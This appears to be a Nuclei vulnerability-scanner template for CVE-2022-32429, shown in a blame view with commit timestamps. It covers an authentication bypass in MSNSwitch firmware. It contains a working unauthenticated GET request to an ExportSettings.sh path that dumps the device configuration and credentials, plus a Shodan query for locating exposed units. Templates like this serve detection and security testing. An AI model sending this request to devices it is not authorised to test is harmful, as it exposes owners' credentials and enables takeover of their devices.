nuclei-templates/cves/2022/CVE-2022-32429.yaml

45 lines
1.3 KiB
YAML
Raw Normal View History

2023-01-23 11:12:48 +00:00
id: CVE-2022-32429
info:
2023-01-26 15:51:53 +00:00
name: MSNSwitch Firmware MNT.2408 - Configuration Dump
2023-01-23 11:12:48 +00:00
author: theabhinavgaur
severity: critical
description: |
2023-01-23 11:59:34 +00:00
The vulnerability is an authentication bypass which allows the full configuration of the unit to be downloaded. The credentials obtained here can then be used via a local subnet vulnerability to obtain a full root shell on the device.
2023-01-23 11:12:48 +00:00
reference:
2023-01-23 11:23:19 +00:00
- https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
- https://elifulkerson.com/CVE-2022-32429/
2023-01-23 11:12:48 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-32429
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-01-23 11:12:48 +00:00
cve-id: CVE-2022-32429
cwe-id: CWE-287
2023-01-23 11:12:48 +00:00
metadata:
shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
verified: "true"
tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch
2023-01-23 11:12:48 +00:00
requests:
2023-01-23 11:32:22 +00:00
- method: GET
path:
- "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"
2023-01-23 11:37:00 +00:00
2023-01-23 11:12:48 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SSID1"
2023-01-26 15:51:53 +00:00
- type: regex
part: header
regex:
- 'filename="Settings(.*).dat'
- 'application/octet-stream'
condition: and
2023-01-23 11:12:48 +00:00
- type: status
status:
- 200